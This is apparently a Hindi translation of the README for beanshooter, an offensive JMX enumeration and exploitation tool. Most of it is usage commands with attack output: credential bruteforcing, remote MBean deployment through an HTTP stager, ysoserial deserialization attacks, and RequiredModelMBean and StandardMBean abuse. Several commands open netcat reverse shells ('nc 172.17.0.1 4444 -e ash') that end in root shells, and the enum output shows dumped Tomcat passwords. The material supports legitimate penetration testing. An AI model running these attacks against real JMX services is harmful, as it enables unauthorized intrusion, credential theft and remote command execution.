
JMX गणना और हमला उपकरण।
beanshooter एक JMX गणना और आक्रमण उपकरण है, जो JMX एंडपॉइंट्स पर सामान्य कमजोरियों की पहचान करने में मदद करता है।
beanshooter एक maven प्रोजेक्ट है और इसकी स्थापना सीधी होनी चाहिए। maven स्थापित होने पर, एक निष्पादन योग्य .jar फ़ाइल बनाने के लिए निम्नलिखित कमांड निष्पादित करें:```console
[qtc@devbox ~]$ git clone https://github.com/qtc-de/beanshooter
[qtc@devbox ~]$ cd beanshooter
[qtc@devbox ~]$ mvn package
आप प्रीबिल्ट पैकेज का भी उपयोग कर सकते हैं जो [प्रत्येक रिलीज़](https://github.com/qtc-de/beanshooter/releases) के लिए बनाए जाते हैं। डेवलपमेंट ब्रांच के लिए प्रीबिल्ट पैकेज स्वचालित रूप से बनाए जाते हैं और *GitHub* [एक्शन पेज](https://github.com/qtc-de/beanshooter/actions) पर पाए जा सकते हैं। साथ ही *beanshooter* चलाने के लिए एक प्रीबिल्ट डॉकर इमेज [उपलब्ध है](#docker-image)।
*beanshooter* में *ysoserial* को निर्भरता के रूप में शामिल नहीं किया गया है। *ysoserial* समर्थन सक्षम करने के लिए, आपको या तो अपनी ``ysoserial.jar`` फ़ाइल का पथ अतिरिक्त तर्क के रूप में निर्दिष्ट करना होगा (उदाहरण के लिए ``--yso /opt/ysoserial.jar``) या प्रोजेक्ट बनाने से पहले [beanshooter कॉन्फ़िगरेशन फ़ाइल](https://github.com/qtc-de/beanshooter/blob/HEAD/beanshooter/config.properties) में डिफ़ॉल्ट पथ बदलना होगा।
*beanshooter* *bash* के लिए स्वतः पूर्णता का समर्थन करता है। स्वतः पूर्णता का लाभ उठाने के लिए, आपके पास [completion-helpers](https://github.com/qtc-de/completion-helpers) प्रोजेक्ट स्थापित होना चाहिए। यदि सही ढंग से सेटअप किया गया है, तो [समापन स्क्रिप्ट](https://github.com/qtc-de/beanshooter/blob/HEAD/resources/bash_completion.d/beanshooter) को अपने ``~/.bash_completion.d`` फ़ोल्डर में कॉपी करने से स्वतः पूर्णता सक्षम हो जाती है।```console
[qtc@devbox ~]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/
बीनशूटर के विभिन्न संचालनों को दो समूहों में विभाजित किया जा सकता है: मूल संचालन और MBean संचालन। जबकि मूल संचालन किसी JMX एंडपॉइंट पर सामान्य संचालन करने के लिए उपयोग किए जाते हैं, MBean संचालन एक विशिष्ट MBean को लक्षित करते हैं जिसके साथ बातचीत की जा सके। अधिक जानकारी के लिए, निम्नलिखित अनुभागों में उपयोग उदाहरण देखें।```console [qtc@devbox ~]$ beanshooter -h usage: beanshooter [-h] ...
beanshooter v3.0.0 - a JMX enumeration and attacking tool
positional arguments:
Basic Operations attr set or get MBean attributes brute bruteforce JMX credentials deploy deploys the specified MBean on the JMX server enum enumerate the JMX service for common vulnerabilities info display method and attribute information on an MBean invoke invoke the specified method on the specified MBean list list available MBEans on the remote MBean server serial perform a deserialization attack stager start a stager server to deliver MBeans undeploy undeploys the specified MBEAN from the JMX server
MBean Operations diagnostic Diagnostic Command MBean hotspot HotSpot Diagnostic MBean mlet default JMX bean that can be used to load additional beans dynamically recorder jfr Flight Recorder MBean tomcat tomcat MemoryUserDatabaseMBean used for user management tonka general purpose bean for executing commands and uploading or download files
named arguments: -h, --help show this help message and exit
### मूल संचालन
---
मूल संचालन सामान्य प्रयोजन संचालन हैं जो JMX सेवा पर किए जा सकते हैं। ये आमतौर पर ऐसे संचालन होते हैं जो किसी विशिष्ट MBean को लक्ष्य नहीं करते या जो ऐसे MBean को लक्ष्य करते हैं जिसमें beanshooter द्वारा कोई अंतर्निहित समर्थन नहीं है।
#### Attr
`attr` कार्रवाई का उपयोग किसी निर्दिष्ट *MBean* पर गुणों को प्राप्त करने या सेट करने के लिए किया जा सकता है। उपलब्ध गुणों को प्राप्त करने के लिए, `info` कार्रवाई का उपयोग किया जाना चाहिए:```console
[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010
...
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+] Attributes:
[+] Verbose (type: boolean , writable: true)
[+] ObjectPendingFinalizationCount (type: int , writable: false)
[+] HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+] Operations:
[+] void gc()
जब केवल विशेषता नाम निर्दिष्ट किया जाता है, beanshooter वर्तमान विशेषता मान प्राप्त करता है और प्रदर्शित करता है:```console [qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose false
जब कोई अतिरिक्त मान निर्दिष्ट किया जाता है, *beanshooter* संबंधित विशेषता सेट करने का प्रयास करता है। उन विशेषताओं के लिए जिनका प्रकार *String* से भिन्न है, `--type` विकल्प का उपयोग करके विशेषता प्रकार निर्दिष्ट करना आवश्यक है:```console
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
true
brute कार्रवाई पासवर्ड-संरक्षित JMX सेवा पर ब्रूटफोर्स हमला करती है। जब बिना किसी अतिरिक्त वैकल्पिक तर्क के चलाया जाता है, तो beanshooter कुछ सामान्य उपयोगकर्ता-नाम और पासवर्ड संयोजनों वाली एक अंतर्निहित वर्डलिस्ट का उपयोग करता है। अधिक समर्पित हमलों के लिए आपको --username-file और --password-file विकल्पों का उपयोग करके अधिक विस्तृत वर्डलिस्ट निर्दिष्ट करनी चाहिए।```console
[qtc@devbox ~]$ beanshooter brute 172.17.0.2 1090
[+] Reading wordlists for the brute action.
[+] Reading credentials from internal wordlist.
[+]
[+] Starting bruteforce attack with 10 credentials.
[+]
[+] Found valid credentials: admin:admin
[+] [10 / 10] [########################################] 100%
[+]
[+] done.
#### तैनात करना
`deploy` क्रिया का उपयोग किसी *JMX* सेवा पर *MBean* तैनात करने के लिए किया जा सकता है। इस क्रिया **नहीं** का उपयोग डिफ़ॉल्ट समर्थन वाले *MBeans* को तैनात करने के लिए किया जाना चाहिए
जैसे कि *TonkaBean*। डिफ़ॉल्ट समर्थन वाले *MBeans* को तैनात करना संबंधित
[एमबीन संचालन](#mbean-operations) के माध्यम से किया जाना चाहिए।
जब आप जिस *MBean* को तैनात करना चाहते हैं वह पहले से *JMX* सेवा को ज्ञात है, तो कार्यान्वित करने वाले
*MBean* वर्ग का वर्ग नाम और वांछित `ObjectName`:```console
[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 javax.management.monitor.StringMonitor qtc.test:type=Monitor
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: StringMonitor
[+] MBean with object name qtc.test:type=Monitor was successfully deployed.
जब MBean वर्ग JMX सेवा को ज्ञात नहीं है, तो आप एक कार्यान्वयन प्रदान करने के लिए --jar-file और --stager-url विकल्पों का उपयोग कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: ExampleBean
[+]
[+] MBean class is not known to the server.
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: MLet
[+] MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: non.existing.example.ExampleBean
[+] Archive: c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Object: qtc.test:type=Example
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+] Sending jar file with md5sum: c4d8f40d1c1ac7f3cf7582092802a484
[+]
[+] MBean with object name qtc.test:type=Example was successfully deployed.
#### Enum
`enum` कार्रवाई एक *JMX* एंडपॉइंट पर कुछ कॉन्फ़िगरेशन विवरणों को सूचीबद्ध करती है। यह हमेशा जाँचती है कि क्या *JMX* एंडपॉइंट्स को प्रमाणीकरण की आवश्यकता है और क्या यह पूर्व-प्रमाणित मनमानी डिसीरियलाइज़ेशन की अनुमति देता है।```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server requires authentication.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer accepted the payload class.
[+] Configuration Status: Non Default
जब प्रमाणीकरण आवश्यक नहीं है, या जब मान्य क्रेडेंशियल निर्दिष्ट किए गए थे, तो enum क्रिया JMX एंडपॉइंट से कुछ और जानकारी को सूचीबद्ध करने का प्रयास भी करती है। इसमें गैर-डिफ़ॉल्ट MBeans की सूची और उदाहरण के लिए, Apache Tomcat सर्वर पर पंजीकृत उपयोगकर्ता खाते शामिल हैं:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server does not require authentication.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer rejected the payload class.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] - 57 MBeans are currently registred on the MBean server.
[+] Listing 39 non default MBeans:
[+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=Valve,host=localhost,name=AccessLogValve)
[+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=GlobalRequestProcessor,name="http-nio-8080")
[...]
[+]
[+] Enumerating tomcat users:
[+]
[+] - Listing 3 tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: P@55w0rD#
[+] Roles:
[+] Users:type=Role,rolename="manager-gui",database=UserDatabase
[+] Users:type=Role,rolename="manager-script",database=UserDatabase
[+] Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: s3cr3T!$
[+] Roles:
[+] Users:type=Role,rolename="admin-gui",database=UserDatabase
[+] Users:type=Role,rolename="admin-script",database=UserDatabase
[...]
जब *SASL* संरक्षित एंडपॉइंट पर `enum` क्रिया का उपयोग किया जाता है, तो *beanshooter* सर्वर के लिए कॉन्फ़िगर किए गए *SASL* प्रोफ़ाइल को सूचीबद्ध करने का प्रयास करता है। यह केवल एक निश्चित सीमा तक संभव है और सर्वर के *TLS* कॉन्फ़िगरेशन को सूचीबद्ध नहीं किया जा सकता है। यदि *beanshooter* द्वारा पहचाना गया *SASL* प्रोफ़ाइल काम नहीं करता है, तो आपको हमेशा `--ssl` विकल्प के साथ/बिना पुनः प्रयास करना चाहिए:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4447 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server uses SASL/DIGEST-MD5 SASL profile.
[+] Credentials are requried and the following hostname must be used: iinsecure.example
[+] Notice: TLS setting cannot be enumerated and --ssl may be required.
[+] Vulnerability Status: Non Vulnerable
...
info क्रिया का उपयोग MBean सर्वर पर उपलब्ध MBeans की विधि और विशेषता जानकारी प्राप्त करने के लिए किया जा सकता है।
जब बिना अतिरिक्त तर्कों के आह्वान किया जाता है, तो सभी उपलब्ध MBeans की विधि और विशेषता जानकारी मुद्रित होती है। जब एक अतिरिक्त ObjectName निर्दिष्ट करते हैं, तो केवल निर्दिष्ट MBean की विधि और विशेषता जानकारी मुद्रित होती है:```console
[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010 java.lang:type=Memory
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+] Attributes:
[+] Verbose (type: boolean , writable: true)
[+] ObjectPendingFinalizationCount (type: int , writable: false)
[+] HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+] ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+] Operations:
[+] void gc()
#### Invoke
`invoke` क्रिया का उपयोग किसी *MBean* पर एक मनमानी विधि को लागू करने के लिए किया जा सकता है जो पहले से *JMX* एंडपॉइंट पर तैनात की गई है।
एंडपॉइंट के अलावा, `invoke` क्रिया में लक्षित *MBean* का `ObjectName` और आप जिस विधि हस्ताक्षर को लागू करना चाहते हैं, वह आवश्यक है। यदि निर्दिष्ट विधि तर्कों की अपेक्षा करती है, तो उन्हें भी निर्दिष्ट करना होगा। निम्नलिखित सूची एक उदाहरण दिखाती है,
एक तर्कहीन विधि आह्वान का, जहाँ `DiagnosticCommand` *MBean* की `vmVersion()` विधि लागू की जाती है:```console
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
OpenJDK 64-Bit Server VM version 11.0.14.1+1
JDK 11.0.14.1
जब किसी ऐसी विधि को कॉल किया जाता है जिसमें पैरामीटर की आवश्यकता होती है, तो निर्दिष्ट beanshooter तर्कों को Java कोड के रूप में मूल्यांकित किया जाता है। सरल तर्क प्रकार जैसे पूर्णांक या स्ट्रिंग को उनके संगत मान निर्दिष्ट करके पारित किया जा सकता है। जटिल तर्क प्रकारों को Java में जैसे आप करते हैं वैसे ही बनाया जा सकता है (जैसे 'new java.util.HashMap()'). निम्नलिखित सूची एक उदाहरण दिखाती है, जहाँ DiagnosticCommand MBean पर help(String[] args) विधि को कॉल किया गया है:```console
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'help(String[] args)' 'new String[] { "Compiler.directives_add" }'
Compiler.directives_add
Add compiler directives from file.
Impact: Low
Permission: java.lang.management.ManagementPermission(monitor)
Syntax : Compiler.directives_add
Arguments: filename : Name of the directives file (STRING, no default value)
अधिक जटिल प्रकार के तर्कों के लिए जिनमें कुछ आरंभीकरण की आवश्यकता होती है, आप *beanshooters PluginSystem* का उपयोग कर सकते हैं और एक कस्टम
क्लास परिभाषित कर सकते हैं जो [IArgumentProvider Interface](https://github.com/qtc-de/beanshooter/blob/HEAD/beanshooter/src/de/qtc/beanshooter/plugin/IArgumentProvider.java) को लागू करता है।
#### Jolokia
जैसा कि *beanshooters* के [Jolokia दस्तावेज़ीकरण](https://github.com/qtc-de/beanshooter/blob/HEAD/docs/jolokia.md) में उल्लिखित है, लगभग सभी *beanshooter* क्रियाओं का उपयोग `--jolokia` स्विच के साथ *Jolokia* आधारित *JMX* एंडपॉइंट्स को लक्षित करने के लिए किया जा सकता है। *Jolokia JMX* एडाप्टर के लिए इस सामान्य समर्थन के अलावा, *beanshooter* एक समर्पित `jolokia` क्रिया का समर्थन करता है। इस क्रिया का उपयोग एक *Jolokia* एजेंट को बाहरी कनेक्शन के लिए बाध्य करने के लिए किया जा सकता है, जो प्रॉक्सी मोड सक्षम होने पर चल रहा हो:```console
[qtc@devbox ~]$ beanshooter jolokia 172.17.0.2 8080 172.17.0.1 4444 --username manager --password admin --ldap
[+] Attempting to trigger outboud connection to 172.17.0.1:4444
[+] Using proxy service URL: service:jmx:Rmi:///jndi/ldap://172.17.0.1:4444/beanshooter
...
[qtc@devbox ~]$ nc -vlp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:60052.
0
वही परिणाम एक नियमित beanshooter ऑपरेशन जैसे list को आह्वान करके और --jolokia-proxy service:jmx:... विकल्प का उपयोग करके प्राप्त किया जा सकता है।
jolokia क्रिया को एक शॉर्टकट के रूप में जोड़ा गया था ताकि आपको JNDI सिंटैक्स याद रखने की आवश्यकता न हो। jolokia क्रिया का उपयोग करते समय, डिफ़ॉल्ट रूप से --jolokia विकल्प मान लिया जाता है।
list क्रिया रिमोट JMX सेवा पर सभी पंजीकृत MBeans की एक सूची प्रिंट करती है:```console
[qtc@devbox ~]$ beanshooter list 172.17.0.2 9010
[+] Available MBeans:
[+]
[+] - sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)
[+] - sun.management.MemoryPoolImpl (java.lang:name=Metaspace,type=MemoryPool)
[+] - javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)
[...]
#### मॉडल
`model` क्रिया सबसे शक्तिशाली *beanshooter* ऑपरेशनों में से एक है और [Markus Wulftange](https://twitter.com/mwulftange) द्वारा पहचानी गई एक तकनीक को लागू करती है जो आपको मनमाने *public* और *static* Java विधियों को आमंत्रित करने की अनुमति देती है। इसके अलावा, *public* ऑब्जेक्ट विधियों को उपयोगकर्ता द्वारा बनाए गए ऑब्जेक्ट इंस्टेंस पर भी आमंत्रित किया जा सकता है। एकमात्र आवश्यकता यह है कि उपयोग की गई विधि तर्क और प्रदान किया गया ऑब्जेक्ट इंस्टेंस (*non static* विधियों के लिए) serializable होने चाहिए।
निम्नलिखित सूची एक उदाहरण उपयोग दिखाती है, जहां एक `File` ऑब्जेक्ट को ऑब्जेक्ट इंस्टेंस के रूप में प्रदान किया गया है और उस पर `String[] list()` ऑपरेशन आमंत्रित किया गया है:```console
[qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
[+] Deploying RequiredModelMBean supporting methods from java.io.File
[+]
[+] Deplyoing MBean: RequiredModelMBean
[+] MBean with object name de.qtc.beanshooter:version=1 was successfully deployed.
[+]
[+] Available Methods:
[+] - java.lang.String toString()
[+] - int hashCode()
[+] - [Ljava.lang.String; list()
[...]
[+] - void setManagedResource(java.lang.Object, java.lang.String)
[+]
[+] Setting managed resource to: new java.io.File("/")
[+] Managed resource was set successfully.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
root
var
opt
srv
bin
mnt
dev
proc
etc
usr
lib
tmp
home
run
media
sbin
sys
.dockerenv
setManagedResource विधि हमेशा उपलब्ध होती है और इसका उपयोग संचालन के लिए ऑब्जेक्ट इंस्टेंस को बदलने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/etc")' objectReference
[+] Call was successful.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
passwd
shells
opt
modules
mtab
issue
inittab
hosts
...
जब *static* विधियों को लागू किया जाता है, तो एक ऑब्जेक्ट इंस्टेंस भी आवश्यक होता है। हालांकि, ऑब्जेक्ट इंस्टेंस का वास्तविक वर्ग मायने नहीं रखता। उदाहरण के लिए, यदि आप `java.lang.System` से `getProperties()` को लागू करना चाहते हैं, तो आप ऑब्जेक्ट इंस्टेंस के रूप में एक साधारण `String` का भी उपयोग कर सकते हैं। इस मामले में केवल निर्दिष्ट वर्ग का नाम मायने रखता है:```console
[qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.lang.System '"does not matter"'
[+] Deploying RequiredModelMBean supporting methods from java.lang.System
[+]
[+] Deplyoing MBean: RequiredModelMBean
[+] MBean with object name de.qtc.beanshooter:version=1 was successfully deployed.
[+]
[+] Available Methods:
[+] - void runFinalization()
[+] - java.lang.String setProperty(java.lang.String, java.lang.String)
[+] - java.lang.String getProperty(java.lang.String)
[+] - java.lang.String getProperty(java.lang.String, java.lang.String)
[+] - long currentTimeMillis()
[+] - long nanoTime()
[+] - java.lang.SecurityManager getSecurityManager()
[+] - void loadLibrary(java.lang.String)
[+] - java.lang.String mapLibraryName(java.lang.String)
[+] - void load(java.lang.String)
[+] - java.lang.String lineSeparator()
[+] - java.io.Console console()
[+] - java.nio.channels.Channel inheritedChannel()
[+] - java.util.Properties getProperties()
[+] - void setProperties(java.util.Properties)
[+] - java.lang.String clearProperty(java.lang.String)
[+] - java.util.Map getenv()
[+] - java.lang.String getenv(java.lang.String)
[+] - void gc()
[+] - void wait()
[+] - java.lang.String toString()
[+] - int hashCode()
[+] - java.lang.Class getClass()
[+] - void notify()
[+] - void notifyAll()
[+] - void setManagedResource(java.lang.Object, java.lang.String)
[+]
[+] Setting managed resource to: "does not matter"
[+] Managed resource was set successfully.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'getProperties()'
java.vm.info
--> mixed mode
java.runtime.version
--> 11.0.18+10-alpine-r0
sun.io.unicode.encoding
--> UnicodeLittle
...
model क्रिया निर्दिष्ट वर्ग पर उपलब्ध विधियों को निर्धारित करने के लिए रिफ्लेक्शन का उपयोग करती है। यदि आपके पास
वर्ग स्थानीय रूप से उपलब्ध नहीं है, तब भी आप --signature या --signature-file विकल्पों के माध्यम से उपलब्ध विधियों को निर्दिष्ट करके इसका उपयोग कर सकते हैं। हालांकि, डिफ़ॉल्ट वर्गों तक पहुंच प्राप्त करने के लिए आपको
एक ऑब्जेक्ट उदाहरण प्रदान करना होगा जो डिफ़ॉल्ट वर्ग ( rt.jar में मौजूद नहीं) भी नहीं है। यह आवश्यक है, क्योंकि
लक्ष्य वर्ग को प्रदान किए गए ऑब्जेक्ट उदाहरण के समान ClassLoader द्वारा लोड किया जाना चाहिए। beanshooters
example-server के लिए, javax.management.remote.message.VersionMessage उपयुक्त है, क्योंकि यह वर्ग
opendmk_jmxremote_optional_jar में मौजूद है जो क्लाइंट और सर्वर दोनों में उपलब्ध है। हम इस
ऑब्जेक्ट उदाहरण का उपयोग करके अन्य कस्टम वर्गों, जैसे de.qtc.beanshooter.server.utils.Logger पर विधियाँ लागू कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=0 de.qtc.beanshooter.server.utils.Logger 'new javax.management.remote.message.VersionMessage("test")' --signature 'String getIndent()'
[+] Deploying RequiredModelMBean supporting user specified methods
[+]
[+] Deplyoing MBean: RequiredModelMBean
[+] MBean with object name de.qtc.beanshooter:version=0 was successfully deployed.
[+]
[+] Available Methods:
[+] - String getIndent()
[+] - void setManagedResource(java.lang.Object, java.lang.String)
[+]
[+] Setting managed resource to: new javax.management.remote.message.VersionMessage("test")
[+] Managed resource was set successfully.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=0 --signature 'String getIndent()'
EMPTY OUTPUT - Just an Indent ;)
यदि आप `model` क्रिया द्वारा कार्यान्वित तकनीक के बारे में अधिक जानना चाहते हैं, तो मैं अत्यधिक
[CODE WHITE](https://twitter.com/codewhitesec) द्वारा लिखित इस [ब्लॉग पोस्ट](https://codewhitesec.blogspot.com/2023/03/jmx-exploitation-revisited.html) की सिफारिश करता हूँ
जो इसे बहुत विस्तार से समझाती है।
#### Serial
`serial` क्रिया का उपयोग *JMX* एंडपॉइंट पर deserialization हमले करने के लिए किया जा सकता है। डिफ़ॉल्ट रूप से, यह क्रिया
प्रमाणीकरण के बाद deserialization हमलों का प्रयास करती है। इसके काम करने के लिए, आपके लक्ष्य *JMX* सेवा को या तो
अनअथेंटिकेटेड पहुँच की अनुमति देनी होगी या आपके पास वैध क्रेडेंशियल्स होने चाहिए:```console
[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+] Creating ysoserial payload... done.
[+] MBeanServer attempted to deserialize the DeserializationCanary class.
[+] Deserialization attack was probably successful.
[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)
JMX सेवाएं भी पूर्व-प्रमाणित डिसीरियलाइज़ेशन हमलों के लिए असुरक्षित हो सकती हैं। इसका दुरुपयोग करने के लिए, आप --preauth स्विच का उपयोग कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --preauth
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+] Creating ysoserial payload... done.
[+] MBeanServer attempted to deserialize the DeserializationCanary class.
[+] Deserialization attack was probably successful.
[qtc@devbox ~]$ nc -vlp 4444 [...] id uid=0(root) gid=0(root) groups=0(root)
Against *JMXMP* endpoints, preauthenticated deserialization is usually possible. Unfortunately, there is no way to enumerate this properly
during the `enum` action. If you encounter a *JMXMP* endpoint, you should just give it a try.
#### Stager
The `stager` action starts a stager server that can be used to deliver *MBeans*. Creating a stager server
for *MBean* delivery is normally done automatically when using *beanshooters* `deploy` action. However,
sometimes it is required to use a standalone server. When using the `stager` action, you can either specify
the name of a builtin *MBean* to deliver (e.g. `tonka`) or the `custom` keyword. If `custom` was specified,
the `--class-name`, `--object-name` and `--jar-file` options are required.```console
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8888 --no-stager
[qtc@devbox ~]$ beanshooter stager 172.17.0.1 8888 tonka
[+] Creating HTTP server on: 172.17.0.1:8888
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /93691b8bae4143f087f7a3123641b20d
[+] Starting HTTP server.
[+]
[+] Press Enter to stop listening.
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 93691b8bae4143f087f7a3123641b20d
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8888
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /93691b8bae4143f087f7a3123641b20d
[+] Sending jar file with md5sum: 6568ffb2934cb978dbd141848b8b128a
standard क्रिया एक StandardMBean तैनात करती है जो विभिन्न लक्ष्यों को प्राप्त करने के लिए TemplateImpl वर्ग को लागू करता है।
यह तकनीक Markus Wulftange द्वारा पहचानी गई थी और beanshooter इसे कमांड निष्पादन, फ़ाइल अपलोड और TonkaBean परिनियोजन की अनुमति देने के लिए लागू करता है।```console
[qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] Deplyoing MBean: StandardMBean
[+] MBean with object name de.qtc.beanshooter:standard=3873612041699 was successfully deployed.
[+]
[+] Caught NullPointerException while invoking the newTransformer action.
[+] This is expected bahavior and the attack most likely worked :)
[+]
[+] Removing MBean with ObjectName de.qtc.beanshooter:standard=3873612041699 from the MBeanServer.
[+] MBean was successfully removed.
...
[qtc@devbox ~]$ nc -vlp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:40033.
id
uid=0(root) gid=0(root) groups=0(root)
`standard` क्रिया के माध्यम से कमांड निष्पादन अंधा होता है और आपको अपने कमांड का आउटपुट प्राप्त नहीं होता है। इसके अलावा, डिफ़ॉल्ट रूप से आपका कमांड `Runtime.exec(String str)` को पास किया जाता है, जो विशेष शेल सुविधाओं का समर्थन नहीं करता है। यदि आप शेल सुविधाओं का उपयोग करना चाहते हैं, तो `--exec-array` विकल्प का उपयोग करें और अपना कमांड इस प्रकार निर्दिष्ट करें: `'sh -c echo "my cool command" > /tmp/test.txt'`। `--exec-array` के साथ, *beanshooter* निर्दिष्ट कमांड को तीन भागों में विभाजित करता है और उन्हें `Runtime.exec(String[] arr)` में पास करता है। हालांकि, कमांड निष्पादित करने के लिए सामान्यतः *TonkaBean* परिनियोजन का उपयोग करने की अनुशंसा की जाती है:```console
[qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 tonka
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] Deplyoing MBean: StandardMBean
[+] MBean with object name de.qtc.beanshooter:standard=4121868972140 was successfully deployed.
[+]
[+] Caught NullPointerException while invoking the newTransformer action.
[+] This is expected bahavior and the attack most likely worked :)
[+]
[+] Removing MBean with ObjectName de.qtc.beanshooter:standard=4121868972140 from the MBeanServer.
[+] MBean was successfully removed.
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[[email protected] /]$ id
uid=0(root) gid=0(root) groups=0(root)
सामान्य tonka deploy क्रिया की तुलना में बड़ा लाभ यह है कि StandardMBean के माध्यम से तैनाती के लिए बाहरी नेटवर्क कनेक्शन की आवश्यकता नहीं होती है। यदि standard ... tonka के माध्यम से सीधी तैनाती काम नहीं करती है, तो आप TonkaBean Jar फ़ाइल अपलोड करके इसे MLet और file:// प्रोटोकॉल के माध्यम से लोड कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter tonka export --stager-url file:///tmp/
[+] Exporting MBean jar file: ./tonka-bean-4.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: ./index.html
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: tonka-bean-4.0.0-jar-with-dependencies.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: file:/tmp/
[qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 upload tonka-bean-4.0.0-jar-with-dependencies.jar::/tmp/tonka-bean-4.0.0-jar-with-dependencies.jar
